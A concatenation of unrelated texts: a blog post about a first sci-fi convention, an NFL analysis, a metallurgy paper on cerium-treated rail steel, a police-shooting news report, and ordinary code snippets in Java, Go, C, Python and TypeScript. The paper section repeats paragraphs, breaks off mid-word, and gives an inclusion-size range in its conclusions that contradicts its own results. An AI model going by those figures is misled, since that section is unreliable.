By that same token, I also entered my cover in Joel Friedlander’s E-book Cover Design Awards for the month of February and the results came back today. Well, he liked it and thought it was “effective” and he really liked the picture itself, but I didn’t win the grand prize or get a gold star. The competition was fierce, but Mr. Friedlander also likely saw the not-quite-right part of the titles that the others saw as well.
That’s things on the artist front, but I promised TWO hats in the title. Thusly, I doff the beret and slide on a Mad Men – esque fedora, straight from central casting. Wearing this hat, I’m focused on things of business and networking. Namely, I need to get out there more into the publishing industry, to meet authors, publishers, agents, and fans that might not have come across my Amazon postings or tweets. So, I’m going to take the ultimate SF nerd plunge and attend my first sci-fi convention.
The next con in my region is RavenCon, up in Richmond April 25-27. I’ve got the hotel room, the registration, made contacts with the Baen Barflies (the only people I know in attendance, and then only by forum postings), and I’m ordering fresh copies of the book to pass out and have commissioned an ad for the con program (below). I think it’ll be a lot of fun (my kind of fun — I couldn’t get the wife to even consider going). Hopefully, I can make some contacts, help the book and its eventual sequel, make some friends, and build some memories. A lot of the sniping, scandals, and arguing amongst fandom concerning “true” fandom, acceptable thought/attitudes/speech, and thin skins vs. true harassment that have been destroying the internet lately have me a little nervous, but I largely cannot help whatever has come before or where things stand now. I hope RavenCon doesn’t get too issue-oriented or political, but my general plan — as it is in all things — is to just be friendly, fun, and fascinating, and trust that my humble awesomeness will shine through to sunder all barriers.
I’ve got this in the bag!
(famous last words before Tom Mays was ripped to shreds by an angry mob of sci-fi fans from across the political landscape) |
/**
* Like {@link #contains(String, String, boolean)} but accepting {@code CharSequence} parameters.
*/
@GenIgnore
default boolean contains(CharSequence name, CharSequence value, boolean caseInsensitive) {
Predicate<String> predicate;
if (caseInsensitive) {
String valueAsString = value.toString();
predicate = val -> val.equalsIgnoreCase(valueAsString);
} else {
predicate = val -> val.contentEquals(value);
}
return getAll(name).stream().anyMatch(predicate);
  }
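  // Example (hypothetical invocation on a MultiMap-style instance `headers`):
  //   headers.contains("Connection", "keep-alive", true)
  // also matches the value "Keep-Alive", since the comparison is case-insensitive.
|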
Five considerations now that Peyton Manning has told the San Francisco 49ers and Tennessee Titans he plans to sign with the Denver Broncos:
Big sighs of relief: Arizona, Seattle and St. Louis no longer must worry about defending against a Manning-led 49ers offense. A healthy Manning would have made the 49ers even more formidable than they were while going 5-1 against the division last season. It's looking like the Seahawks will be the team in the division with the best shot at upgrading their quarterback situation.
Harbaugh must take lead: The seemingly special bond between 49ers coach Jim Harbaugh and 2011 starter Alex Smith could need some repairing. That should not be too difficult if Harbaugh has been forthright with Smith throughout the process. The 49ers, like the Cardinals, will want to define their interest in Manning as a special case unrelated to their incumbent quarterback. Re-signing Smith should be a no-brainer now.
Smith's only logical option. Smith has made it known he wants to continue playing for the 49ers. Hurt feelings suffered during negotiations and the Manning diversion should not be grounds for divorce. Unless Smith acts hastily out of anger, which seems unlikely given his temperament, the 49ers should now be able to re-sign Smith to a deal that gives them the flexibility to hand things over to Colin Kaepernick in the next couple years if Smith falters. The 49ers did lose some leverage, however, when Manning picked Denver over Tennessee. A deal with the Titans would have pushed Matt Hasselbeck onto the market. |
package responses
type Header struct {
D struct {
Results []struct {
Metadata struct {
ID string `json:"id"`
URI string `json:"uri"`
Type string `json:"type"`
Etag string `json:"etag"`
} `json:"__metadata"`
FiscalYear string `json:"FiscalYear"`
PhysicalInventoryDocument string `json:"PhysicalInventoryDocument"`
InventoryTransactionType string `json:"InventoryTransactionType"`
Plant string `json:"Plant"`
StorageLocation string `json:"StorageLocation"`
InventorySpecialStockType string `json:"InventorySpecialStockType"`
DocumentDate string `json:"DocumentDate"`
PhysInventoryPlannedCountDate string `json:"PhysInventoryPlannedCountDate"`
PhysicalInventoryLastCountDate string `json:"PhysicalInventoryLastCountDate"`
PostingDate string `json:"PostingDate"`
FiscalPeriod string `json:"FiscalPeriod"`
PostingIsBlockedForPhysInvtry bool `json:"PostingIsBlockedForPhysInvtry"`
PhysicalInventoryCountStatus string `json:"PhysicalInventoryCountStatus"`
PhysInvtryAdjustmentPostingSts string `json:"PhysInvtryAdjustmentPostingSts"`
PhysInvtryDeletionStatus string `json:"PhysInvtryDeletionStatus"`
PhysInvtryDocHasQtySnapshot bool `json:"PhysInvtryDocHasQtySnapshot"`
PhysicalInventoryGroupType string `json:"PhysicalInventoryGroupType"`
PhysicalInventoryGroup string `json:"PhysicalInventoryGroup"`
PhysicalInventoryNumber string `json:"PhysicalInventoryNumber"`
PhysInventoryReferenceNumber string `json:"PhysInventoryReferenceNumber"`
PhysicalInventoryDocumentDesc string `json:"PhysicalInventoryDocumentDesc"`
PhysicalInventoryType string `json:"PhysicalInventoryType"`
LastChangeDateTime string `json:"LastChangeDateTime"`
ToItem struct {
Deferred struct {
URI string `json:"uri"`
} `json:"__deferred"`
} `json:"to_PhysicalInventoryDocumentItem"`
} `json:"results"`
} `json:"d"`
}
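// A minimal decoding sketch (assuming `raw` holds the OData response body):
//
//	var header Header
//	if err := json.Unmarshal(raw, &header); err != nil {
//		// handle the error
//	}
//	for _, result := range header.D.Results {
//		_ = result.PhysicalInventoryDocument
//	}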
|
Effect of Rare Earth Cerium Content on Manganese Sulfide in U75V Heavy Rail Steel
To study the effect of Ce on the morphology of manganese sulfide, we added different contents of Ce to U75V heavy rail steel. The composition and morphology of the sulfides in the steel were analyzed. The number, size, and aspect ratio of the inclusions were analyzed with an ASPEX automatic scanning electron microscope. The results show that the inclusions in heavy rail steel without Ce are elongated MnS and irregular Al-Si-Ca-O inclusions. As the Ce content increases from 52 ppm to 340 ppm, the composition of the main inclusions changes along the route Ce2O2S-MnS → Ce2O2S-MnS-Ce2S3 → Ce2O2S-Ce3S4-Ce2S3 → Ce2O2S-Ce3S4-CeS. Ce has a noticeable spheroidization effect on MnS and can make the inclusions fine and dispersed. When the Ce content is 139 ppm, the average size of the inclusions is the smallest. The mechanism of Ce-modified MnS is discussed by combining the experimental results with thermodynamic calculations. Finally, the effect of Ce treatment on inhibiting MnS deformation was verified by simulated rolling.
Introduction
U75V high-speed heavy rail steel is a fine pearlite steel with high strength, toughness, and wear resistance. It exhibits high sensitivity to white spots; however, it is difficult to completely remove hydrogen from this type of steel. According to previous studies, an increase in the S content of the steel or the presence of MnS can reduce the diffusion coefficient of hydrogen in steel, thereby mitigating the damage caused by hydrogen. However, due to the excellent deformation ability of MnS, its elongation along the rolling direction during the rolling process has become one of the essential factors causing excessive inclusions and inconsistencies in ultrasonic flaw detection. The large, long-striped MnS structures induce anisotropy in the steel and significantly reduce the transverse properties of the material. MnS inclusions initiate crack formation, which occurs at the interface between the sulfide and the matrix under stress. With an increase in the load, the crack expands gradually along the striped MnS inclusions. Therefore, to improve the mechanical properties of heavy rail steel, it is particularly vital to control the morphology, size, number density, and distribution of MnS.
At present, there are generally two methods to control the morphology of MnS during the steelmaking process. The first method involves the formation of a mass of oxide inclusions in the molten steel by adding titanium, magnesium, zirconium, and other elements to promote the heterogeneous nucleation of MnS precipitates. This method allows the formation of small and dispersed MnS inclusions. Oikawa et al. found that the size of MnS inclusions decreased significantly after adding Ti to Fe-0.1C-1Mn-0.02S steel. They proposed that the liquid nuclei of (Ti, Mn)O formed at the solid-liquid interface of the steel serve as the heterogeneous nucleation sites of MnS droplets. Xie et al. reported that when the Mg content of 16MnCrS5 steel was 35-42 ppm, numerous fine spindle-shaped or spherical composite inclusions with MgO-Al2O3 as the core and MnS as the shell were formed.
Materials and Methods
The experiment was completed in a tubular Si-Mo resistance furnace. A 300 g U75V steel sample, taken from the casting billet and cut into small pieces, was put into a MgO crucible with an inner diameter of 40 mm and an outer diameter of 48 mm. A graphite crucible was coated on the MgO crucible to protect the furnace. The schematic diagram of the resistance furnace and the composition of the molten steel are shown in Figure 1 and Table 1.
The schematic diagram of the experimental process is shown in Figure 2a. After the crucible was placed, the upper and lower ends of the furnace were closed, and the temperature of the resistance furnace was set as shown in Figure 2a. When the temperature reached 1600 °C, it was held for 30 min to ensure that the steel blocks were melted and completely homogenized. Then, Ce was wrapped with pure iron foil and added to the molten steel without stirring. Five levels of Ce content, 52 ppm, 139 ppm, 171 ppm, 256 ppm, and 340 ppm, were used to study the effect of Ce content on inclusions in heavy rail steel. After holding for 15 min, the temperature began to decrease. When the temperature dropped to 700 °C, the power was cut off, and the resistance furnace was cooled to room temperature by furnace cooling. In total, 2.5 L/min argon was injected throughout the experiment.
The ingot was cut into a cylindrical sample of ∅8 × 15 mm, which was used for the simulated rolling experiment. The temperature schedule follows the production process of a plant, as shown in Figure 2b. The simulated rolling experiment was completed on a Gleeble-3500 thermal simulation testing machine (Dynamic Systems Inc., Poestenkill, NY, USA), and the deformed samples were cut, polished, and observed with ASPEX.
The Ce content was measured by the ICP method. The composition, quantity, size, and aspect ratio of the inclusions were analyzed by an ASPEX automatic scanning electron microscope (FEI, Hillsboro, OR, USA) after the ingot was ground and polished. The sampling position, analysis surface, and random observation positions are shown in Figure 3; this arrangement reduces the influence of S segregation inside the ingot. The scanning area of each sample was about 10 mm², and the minimum size of the inclusions scanned was 1 µm. The inclusion morphology was observed by a ZEISS electron microscope equipped with an EDS (Energy Dispersive Spectrometer), model Gemini SEM 500 (Zeiss, Niedersachsen, Germany). The extraction of inclusions was conducted by electrolysis with an anhydrous organic solution; the electrolyte was a 10% AA solution (a mixed solution of 1% tetramethylammonium chloride-10% acetylacetone-89% methanol). Figure 4 is the schematic diagram of the electrolytic cell. The current density was 0.04 A/cm², the temperature was 0~5 °C, and the electrolysis time was 4 h. After electrolysis, the solution was filtered with a polytetrafluoroethylene (PTFE) filter membrane. After spraying gold on the filter membrane, the three-dimensional characteristics of the inclusions were observed by field emission scanning electron microscopy. Table 2 shows the Ce content in each sample, where C0 is the control group without Ce addition.
Figure 5 shows the morphology and elemental mapping profiles of typical inclusions with different Ce contents. Figure 5a,b shows the control group C0 without Ce treatment: the inclusions are mainly large, irregular, striped MnS and spherical Al2O3-SiO2-CaO inclusions. After Ce treatment, the inclusions in the steel convert to Ce oxysulfides or Ce sulfides, which is in agreement with the results reported by Adabavazeh et al. and Gao et al. Because of the low wettability and large contact angle between Ce-containing inclusions and molten steel, the inclusions in the molten steel are ellipsoidal, and their size is markedly reduced. When the Ce content was 52 ppm, the primary inclusion type was Ce2O2S forming the core, with a small amount of MnS precipitated on the surface, as shown in Figure 5c. In addition to the Ce2O2S-MnS composite inclusions, CexS inclusions were observed when the Ce content was 139 ppm and 171 ppm, as shown in Figure 5d. However, when the Ce content was approximately 256 and 340 ppm, the typical inclusions were single Ce2O2S inclusions and composite Ce2O2S-CexS inclusions, as shown in Figure 5e,f.
The three-dimensional morphology of typical inclusions with different Ce contents is shown in Figure 6. Figure 6a shows the morphology of MnS in the steel without Ce addition; it can be seen that MnS is irregular and large. When the Ce content was 52 ppm, the typical inclusion was an ellipsoidal composite with Ce2O2S as the core and a small amount of MnS precipitated on the surface; no single irregular MnS precipitates were observed, as shown in Figure 6b. At higher Ce contents, the typical inclusions were composite Ce2O2S-CexS, as shown in Figure 6e,f. It is worth mentioning that in Figure 6c the inclusion comprised Ce2O2S as the core with surface precipitation of both MnS and CexS; this type of inclusion is not observed in the two-dimensional morphology, indicating that the three-dimensional morphology can more accurately reveal the type of inclusions. The variation trend of the inclusions is similar to that illustrated in Figure 5.
The typical inclusion types of each sample obtained after electron microscopy were classified and counted; the results are summarized in Table 3. When the Ce content was 52 ppm, the striped MnS disappeared. Nonetheless, the Ce content must be optimized on the basis of the size, number density, and aspect ratio of the inclusions.
[Table 3. Typical inclusions in each sample — column headers: Si-Al-Ca-O, MnS, Ce2O2S-MnS, CexS, Ce2O2S, Ce2O2S-CexS, Ce2O2S-CexS-MnS; legend: one mark denotes the main type of inclusions, √ denotes a small number of inclusions; the per-sample marks were lost in extraction.]
Number Density, Size, and Aspect Ratio of Inclusions
To quantitatively characterize the inclusions in the steel samples, the number density, average size, and aspect ratio of the inclusions were calculated; the results are shown in Figures 7 and 8.
Figure 7 shows the changes in the number density and size of the inclusions in the different samples. Ce addition was found to significantly increase the number density of the inclusions in the molten steel. When Ce was not added, the number density of the inclusions was 17.74/mm². With an increase in the Ce content, the number density of the inclusions increased, reaching a maximum of 51.76/mm² at 340 ppm Ce. In addition, Ce addition can significantly reduce the size of the inclusions: the average size of the inclusions before Ce addition was 6.74 µm, whereas after Ce addition it was 3.22-4.16 µm. Unlike the number density, the average size of the inclusions first decreased and then increased with an increase in the Ce content, which agrees with the result of Luo and Wang. The free energy of binding of Ce with O and S in steel is considerably lower than that of Mn with S; thus, rare earth oxysulfides are easily generated. Moreover, the melting point of rare earth sulfides is higher than that of MnS, and they precipitate before MnS during the solidification process. The continuous consumption of S reduces the activity of S in the steel, which significantly suppresses the combination of Mn and S, thereby decreasing the number of heterogeneous nucleation cores and reducing the probability that single-particle MnS inclusions transform into large MnS inclusions under high supersaturation conditions. When the Ce content is high or excessive, the added Ce binds strongly to the inclusion-forming elements, resulting in a large number of rare earth inclusions; the inclusion collision and aggregation probabilities then increase sharply, and the inclusion size grows gradually.
The effect of the Ce content on the aspect ratio of the inclusions is shown in Figure 8. The average aspect ratio of the inclusions decreased significantly after Ce addition: the aspect ratio of the inclusions without Ce was 1.9, whereas for the inclusions with Ce it was between 1.55 and 1.86. The average aspect ratio of the inclusions increases with the Ce content. The proportion of inclusions with an aspect ratio between one and two increased significantly after Ce treatment, while the proportions of inclusions with an aspect ratio between two and three and greater than three decreased, indicating that Ce addition has an apparent spheroidization effect on the inclusions. However, when the Ce content is excessive, i.e., more than 256 ppm, the proportion of inclusions with an aspect ratio between one and two decreases gradually, whereas the proportion with an aspect ratio between two and three increases gradually. This trend arises because inclusion collision and aggregation lead to irregular shapes and size enlargement, indicating that an excessive Ce content is not conducive to the dispersion and fine control of the inclusions. According to the number density, size, and aspect ratio of the inclusions, many fine and dispersed ellipsoidal inclusions can be generated at 139 ppm Ce.
Thermodynamic Analysis of Inclusion Formation in Steel
The precipitation in each sample during the cooling process was calculated with FactSage 8.1, a thermodynamic calculation software; the results are shown in Figure 9. The inclusions without Ce were primarily the Al2O3-SiO2-MgO system and MnS. When the Ce content was 52 ppm, a large amount of dispersed Ce2O2S was formed at 1600 °C. Ce2O2S acts as a heterogeneous nucleation core during the cooling of the molten steel, which facilitates MnS precipitation on its surface and avoids the formation of long-striped MnS. As can be seen in Figure 9c, when the Ce content was 139 ppm, CeS began to form at high temperatures. During the cooling process, CeS was first converted to Ce3S4 and finally to Ce2S3 near the liquidus temperature. With a further increase in the Ce content to 171 ppm, the Ce2O2S content changed only slightly, the Ce2S3 content increased gradually, and the amount of MnS precipitates decreased gradually, as shown in Figure 9d. As shown in Figure 9e,f, when the Ce content was 256 and 340 ppm, MnS precipitation did not occur at all, and the stable sulfide phases after solidification changed from single Ce2S3 to Ce2S3 plus Ce3S4, and to CeS plus Ce3S4, respectively, which is consistent with the analysis of the inclusion morphology above. Through the above analysis, we confirm that Ce mitigates the formation of long-striped MnS in two ways: (1) Ce induces the precipitation of MnS on the surface of oxysulfides, and (2) the total amount of MnS precipitates is reduced through S consumption.
Evolution Mechanism of Inclusions in Heavy Rail Steel after Adding Ce
Based on the thermodynamic calculation and the experimental results, the evolution mechanism of the inclusions in U75V heavy rail steel after Ce addition was investigated, as illustrated in Figure 10. According to the composition and morphology analysis of the inclusions, mass Ce2O2S phases exist in the inclusions upon Ce addition, which mainly have two sources. (1) The entry of Ce into molten steel and its combination with O and S
Evolution Mechanism of Inclusions in Heavy Rail Steel after Adding Ce
Based on the thermodynamic calculation and the experimental results, the evolution mechanism of the inclusions in U75V heavy rail steel after Ce addition was investigated, as illustrated in Figure 10. According to the composition and morphology analysis of the inclusions, mass Ce 2 O 2 S phases exist in the inclusions upon Ce addition, which mainly have two sources. (1) The entry of Ce into molten steel and its combination with O and S in the molten steel, which can be expressed as Equation (1) , and (2) the modification of the SiO 2 -Al 2 O 3 -CaO inclusion upon Ce addition. When Ce is not added to molten steel, the inclusions at high temperature mainly comprise the SiO 2 -Al 2 O 3 -CaO system. These inclusions are generally large and irregular in shape, while MnS is precipitated during solidification . Therefore, Ce added to the molten steel first diffuses to the interface between the oxide inclusions and molten steel in the form of atoms, followed by their conversion to the ionic form and attachment to the surface of the oxide inclusions. Second, Ce ions react with the active sites on the oxide surface, and reaction products CeAlO 3 and Ce 2 O 3 adhere to the surface of the original inclusion in the form of a liquid film and grow. As the reaction proceeds, Ce and O in the molten steel continue to diffuse into the interface; the reaction proceeds smoothly, with an increase in the thickness of the liquid film. Once the liquid film reaches a specific thickness, it solidifies and aggregates into spheres according to the principle of minimum surface energy . Thus, a composite inclusion with Si-Al-Ca-O as the core and Ce-Si-Al-Ca oxide as the surface is formed. Al and Si in the inner layer also diffuses to the outer layer with further reaction. Ce ions continue to diffuse to the inner layer, and the required diffusion driving force increases accordingly. At this stage, the ion exchange process of Ce and Al, Si and Ca slows down. Till the end of the diffusion process of internal and external ions, Ce completes the modification of Al-Si-Ca oxide in steel, which can be expressed as Equation (2) . At this stage, the content of Ce in molten steel is sufficient to allow the reaction between Ce oxide S in molten steel, generating oxygen sulfide, which can be expressed as Equation (3) . Till the end of the diffusion process of internal and external ions, Ce completes the modification of Al-Si-Ca oxide in steel, which can be expressed as Equation (2) . At this stage, the content of Ce in molten steel is sufficient to allow the reaction between Ce oxide S in molten steel, generating oxygen sulfide, which can be expressed as Equation (3) . The subsequent inclusion evolution can be roughly divided into three paths according to the different Ce contents. When the content of Ce in molten steel is low (52 ppm), the Ce2O2S inclusions are formed at steelmaking temperature. As the temperature decreases to the liquidus, MnS precipitates on the surface of the Ce2O2S inclusions until the temperature drops to room temperature and the inclusions are composed of the Ce2O2S-MnS composite. When the Ce content of molten steel increases to the moderate levels of 139 and 171 ppm, Ce reacts with S in molten steel to form CeS at the steelmaking temperature. Then, with the decrease in temperature, CeS will undergo phase transfor- The subsequent inclusion evolution can be roughly divided into three paths according to the different Ce contents. 
The subsequent inclusion evolution can be roughly divided into three paths according to the Ce content. When the Ce content of the molten steel is low (52 ppm), Ce2O2S inclusions form at the steelmaking temperature. As the temperature decreases to the liquidus, MnS precipitates on the surface of the Ce2O2S inclusions, so that at room temperature the inclusions are Ce2O2S-MnS composites. When the Ce content increases to the moderate levels of 139 and 171 ppm, Ce reacts with S in the molten steel to form CeS at the steelmaking temperature. Then, as the temperature decreases, CeS undergoes phase transformation, from CeS to Ce3S4 and then to Ce2S3, and some of these compounds embed on the surface of Ce2O2S. When the temperature decreases further to the liquidus, MnS begins to precipitate on Ce2O2S. Finally, upon cooling to room temperature, the inclusions comprise Ce2O2S-MnS-Ce2S3. Ce2O2S and CeS are also formed at high temperature when the Ce content of the molten steel reaches 256 and 340 ppm, but no MnS precipitates during cooling. The difference is that CeS transforms completely into Ce2S3 and Ce3S4 at 256 ppm Ce, whereas it transforms only partially into Ce3S4 at 340 ppm. The formation of the Ce sulfides can be described by Equations (4)-(6):

[Ce] + [S] = (CeS), ΔG^θ = −422100 + 120.38T (4)

3.5. Effect of Ce on Sulfide after Simulated Rolling

Figure 11 shows the distribution of the aspect ratios of the inclusions after hot compression. The average aspect ratio of the inclusions in C0 was 2.77, while that of the inclusions in the Ce-added samples after hot compression was 1.54-1.83, significantly smaller than the former, indicating that the inclusions of the Ce-added steel remain near-spherical after hot compression. Regarding the proportions of the inclusions with different aspect ratios, the proportions in sample C0 were ~30%. Compared with those before rolling, as shown in Figure 8, the proportion of the inclusions with aspect ratios between one and two was significantly reduced, and the proportions of those with aspect ratios between two and three and larger than three were significantly increased, indicating that MnS deformed during hot compression. According to the change in the aspect ratios before and after simulated rolling, the change in the aspect ratio of the inclusions in C0 was 45.79%. In contrast, the aspect ratios of C1 to C5 with Ce addition changed negligibly, indicating that MnS is not elongated; this confirms that Ce can effectively inhibit the deformation of MnS during rolling. Based on the calculated number density and size of the inclusions, the inclusions in C2 have a high number density and a small size. Therefore, to obtain numerous small and dispersed deformation-resistant inclusions in U75V heavy rail steel, the Ce content should be controlled at 139 ppm.
Conclusions
This study analyzed the composition, two-dimensional and three-dimensional morphologies, number density, and size of the inclusions in heavy rail steel with different Ce contents. The evolution of the inclusions after Ce addition was discussed, and the effect of the added Ce on MnS modification was investigated in terms of the aspect ratio of the inclusions before and after thermal deformation. The conclusions are as follows:
(1) Without Ce addition, the inclusions in the heavy rail steel were elongated MnS and irregular Al-Si-Ca-O inclusions. As the Ce content increased from 52 to 340 ppm, the composition of the main inclusions changed in the order Ce2O2S-MnS → Ce2O2S-MnS-Ce2S3 → Ce2O2S-Ce3S4-Ce2S3 → Ce2O2S-Ce3S4-CeS.
(2) The addition of Ce to the molten steel causes a significant increase in the number density and a considerable reduction in the size and aspect ratio of the inclusions. The average size of the inclusions without Ce was 6.74 µm, whereas upon Ce addition it was 2.01-4.04 µm; the inclusions were smallest at 139 ppm Ce.
(3) The change in the aspect ratio of the inclusions before and after thermal deformation was minimal, indicating that Ce can significantly inhibit the deformation of the inclusions during hot compression. When the Ce content of the molten steel was 139 ppm, substantial amounts of dispersed, fine, and deformation-resistant inclusions could be obtained. |
// repo: dreycat/SomaOS
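// JSON round-tripping is a cheap deep clone, but it drops functions,
// undefined and symbol values, turns Dates into ISO strings, and throws
// on cyclic structures.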
export const deepClone = (x: any) => JSON.parse(JSON.stringify(x));
|
package com.corpus.service;
import net.sf.json.JSONArray;
public interface TrainingService {
//Generate the training set and the test set
public String getSet(JSONArray jsonArray);
//Generate only, without exporting
//Generate and export
}
|
/* documents/cFiles/operatingSystems/sourceCode/chapter13/printinitoncetest.c */
#include <stdio.h>
int printinitonce(void);
extern int var;
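/* Assumption (not shown in this file): printinitonce() initializes the
 * global `var` exactly once -- e.g. via pthread_once() -- so all three
 * printf calls below should print the same value. */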
int main(void) {
printinitonce();
printf("var is %d\n",var);
printinitonce();
printf("var is %d\n",var);
printinitonce();
printf("var is %d\n",var);
return 0;
}
|
import org.slf4j.ILoggerFactory;
import org.slf4j.Logger;

/**
 * Created by Artem Godin on 3/25/2020.
 */
public final class DisconnectProductionLoggerFactorySubstitution {
    // DisconnectProductionLogger and DisconnectProductionLoggerFactory are
    // assumed to be sibling classes in this project; they are not shown here.
    private static final Logger productionLogger = new DisconnectProductionLogger();
    private static final ILoggerFactory productionLoggerFactory =
            new DisconnectProductionLoggerFactory();
private DisconnectProductionLoggerFactorySubstitution() {
}
public static Logger getLogger(String name) {
return productionLogger;
}
public static Logger getLogger(Class<?> clazz) {
return productionLogger;
}
public static ILoggerFactory getILoggerFactory() {
return productionLoggerFactory;
}
} |
def upload_artifact_content(self, origin, container, attachment_name, content=None,
index=None, append=None, is_async=False):
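    """Upload attachment content onto a workspace artifact.

    Thin wrapper: all arguments are forwarded unchanged to the underlying
    artifact client's ``upload`` call, which defines their exact semantics.
    """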
return self._execute_with_workspace_arguments(self._client.artifact.upload,
origin=origin,
container=container,
path=attachment_name,
content=content,
index=index,
append=append,
is_async=is_async) |
[Photo caption: The scene off Lynnhaven Parkway. Copyright by WAVY - All rights reserved]
WAVY Staff -
VIRGINIA BEACH, Va. (WAVY) -- Two people were killed during an officer-involved shooting in Virginia Beach. Police said a suspect shot at officers, who returned fire.
It happened outside the 7-Eleven at the corner of Lynnhaven Parkway and Salem Road. A little before midnight Saturday, Virginia Beach police got information about a person of interest in a homicide case.
Officers found the subject in a car outside the 7-Eleven at 2093 Lynnhaven Parkway. When officers got close, police say the subject shot at them. A bullet went through one officer's shirt. He was not harmed.
"Over the fence over there we heard pop-pop," a person who lived nearby said. "Then a moment of silence then I heard a loud burst of gunfire. It sounded like an automatic weapon."
Those officers shot back at the car and hit the subject. During the shooting, bullets also struck the female driver of the car. Both the driver and the suspect died at the scene. They were identified Monday as 35-year-old Angelo Delano Perry of Virginia Beach and 28-year-old India Kager of College Park, Maryland.
"There was a whole bunch of cop cars racing to the scene and there was a van over there with bullet holes in it and a black car," Daquon Brown, who saw the investigation said. "It looked like it was crashed; looked like the van crashed into it."
"The officers that were involved in this will be placed on administrative duty," Virginia Beach Public Information Officer Tonya Borman said. "Any case that is officer-involved is also looked at internally. It's a three-prong investigation involving our internal affairs, our homicide unit and the Commonwealth's Attorney's Office."
Ofc. Borman said an infant was in the car at the time of the shooting. That child was not harmed and was turned over to Child Protective Services.
Virginia Beach Police are also conducting an active investigation of other suspects related to the original homicide investigation. |
package http;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
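/**
 * Thin wrapper around a raw HTTP request byte message: exposes the request
 * line, headers, body, and charset detection, and can rewrite the
 * Content-Length header after the body has been modified.
 */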
public class HttpRequest extends HttpBase{
private static final long serialVersionUID = 2950552847217478218L;
private final static Logger logger = LogManager.getLogger(HttpRequest.class);
private HttpRequestLine httprequestline;
public HttpRequest(byte [] requestMessage){
super(requestMessage);
String httpMessage = new String(super.rawMessage);
String requestLine = StringUtils.substringBefore(httpMessage,"\r\n");
this.httprequestline = new HttpRequestLine(requestLine);
}
public HttpRequestLine getRequestLine(){
return this.httprequestline;
}
public String getRequestLineString(){
return httprequestline.getRequestLineStringNoCRLF();
}
public String getBodyParameter(){
String method = httprequestline.getMethod();
String returnString = null;
if("POST".equals(method)){
returnString = StringUtils.substringAfterLast(new String(super.rawMessage), "\r\n\r\n");
}else{
returnString = null;
}
return returnString;
}
public void setRequestLine(String requestLine){
this.httprequestline = new HttpRequestLine(requestLine);
}
public void updateContentLength(){
    String requestMessage = new String(super.rawMessage);
    String requestBody = StringUtils.substringAfter(requestMessage, "\r\n\r\n");
    if(requestBody.length() < 1){
        return;
    }
    // Measure the body in bytes, using the declared charset when one is known.
    String charsetString = this.getCharset();
    int contentLength;
    if(charsetString != null){
        try {
            contentLength = requestBody.getBytes(charsetString).length;
        } catch (UnsupportedEncodingException e) {
            contentLength = requestBody.getBytes().length;
            logger.debug(e);
        }
    }else{
        contentLength = requestBody.getBytes().length;
    }
    // Rewrite the Content-Length header in place.
    Pattern p = Pattern.compile("Content-Length: [0-9]*");
    Matcher m = p.matcher(requestMessage);
    String newMessage = m.replaceFirst("Content-Length: " + Integer.toString(contentLength));
    super.rawMessage = newMessage.getBytes();
}
public String getCharset(){
    // Scan the headers for Content-Type and map its charset parameter onto
    // a canonical Java charset name; returns null when none is recognized.
    String [] headers = this.getHeaders();
    String targetString = "";
    for(int i=0;i<headers.length;i++){
        targetString = headers[i];
        if(StringUtils.containsIgnoreCase(targetString,"Content-Type: ")){
            break;
        }
    }
    String retString = null;
    Pattern p = Pattern.compile("charset=.*");
    Matcher m = p.matcher(targetString);
    if(m.find()){
        String matchstr = m.group();
        if(StringUtils.containsIgnoreCase(matchstr,"SHIFT_JIS")){
            retString = "Shift_JIS";
        }else if(StringUtils.containsIgnoreCase(matchstr,"UTF-8")){
            retString = "UTF-8";
        }else if(StringUtils.containsIgnoreCase(matchstr,"EUC-JP")){
            retString = "EUC-JP";
        }
    }
    return retString;
}
public String[] getHeaders(){
    // Everything between the request line and the blank line, one header per entry.
    String requestAllHeader = StringUtils.substringBefore(new String(super.rawMessage),"\r\n\r\n");
    String requestHeader = StringUtils.substringAfter(requestAllHeader,"\r\n");
    return requestHeader.split("\r\n");
}
public String[] getRedirectHeaders(){
    // Copy every header except Content-Length, which must be recomputed
    // before the request is re-sent.
    String [] headers = this.getHeaders();
    ArrayList<String> retArray = new ArrayList<>();
    for(int i=0;i<headers.length;i++){
        if(!headers[i].startsWith("Content-Length")){
            retArray.add(headers[i]);
        }
    }
    return retArray.toArray(new String[0]);
}
@Override
public String toString() {
return new String(super.rawMessage);
}
//setter.getter
public String getHttpRequestString(){
return new String(super.rawMessage);
}
public String getHttpRequestMethod(){
return httprequestline.getMethod();
}
public String getHttpRequestPath(){
return httprequestline.getPath();
}
public String getHttpRequestVersion(){
return httprequestline.getVersion();
}
}
|
//*****************************************************************************
//
//! Returns the current value of the AV (Address Valid) flag.
//!
//! \param psSMBus specifies the SMBus configuration structure.
//!
//! This returns the value of the AV (Address Valid) flag.
//!
//! \return Returns \b true if set, or \b false if cleared.
//
//*****************************************************************************
bool
SMBusSlaveARPFlagAVGet(tSMBus *psSMBus)
{
    // Get the value of the block address valid flag.
return(HWREGBITB(&psSMBus->ui16Flags, FLAG_ADDRESS_VALID));
} |
def tfidfQuery(self, queryTerms, idf):
    # Normalized tf-idf weight vector for a query.
    # Assumes `math` and collections.Counter are imported at module level.
    if len(queryTerms) == 0:
        return []  # an empty query yields an empty weight vector
    tfQuery = Counter(queryTerms)
    # Log-scale each distinct term once, so repeated terms are weighted
    # consistently across all of their occurrences.
    weights = {}
    for word, count in tfQuery.items():
        weights[word] = (1 + math.log(count)) * idf[word]
    tf_idfQuery = [weights[word] for word in queryTerms]
    normTfIdf = math.sqrt(sum(x ** 2 for x in tf_idfQuery))
    if normTfIdf == 0:
        return [0]
    return [x / normTfIdf for x in tf_idfQuery]
|
// Load loads a TOML file from path.
func (c *Config) Load(path string) error {
md, err := toml.DecodeFile(path, c)
if err != nil {
return err
}
if len(md.Undecoded()) > 0 {
return errors.New("Unknown config keys in " + path)
}
if len(c.Incoming.AllowFrom) > 0 {
subnets := make([]*net.IPNet, 0, len(c.Incoming.AllowFrom))
for _, s := range c.Incoming.AllowFrom {
if strings.IndexByte(s, '/') == -1 {
s = s + "/32"
}
_, n, err := net.ParseCIDR(s)
if err != nil {
return errors.New("Invalid network or IP address: " + s)
}
subnets = append(subnets, n)
}
c.Incoming.allowSubnets = subnets
}
c.Outgoing.AllowSites = toLowerStrings(c.Outgoing.AllowSites)
c.Outgoing.DenySites = toLowerStrings(c.Outgoing.DenySites)
return nil
} |
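For reference, a hypothetical config file this loader would accept; the key names below assume the Config struct's toml tags mirror the field names used above, which the snippet does not show:

[incoming]
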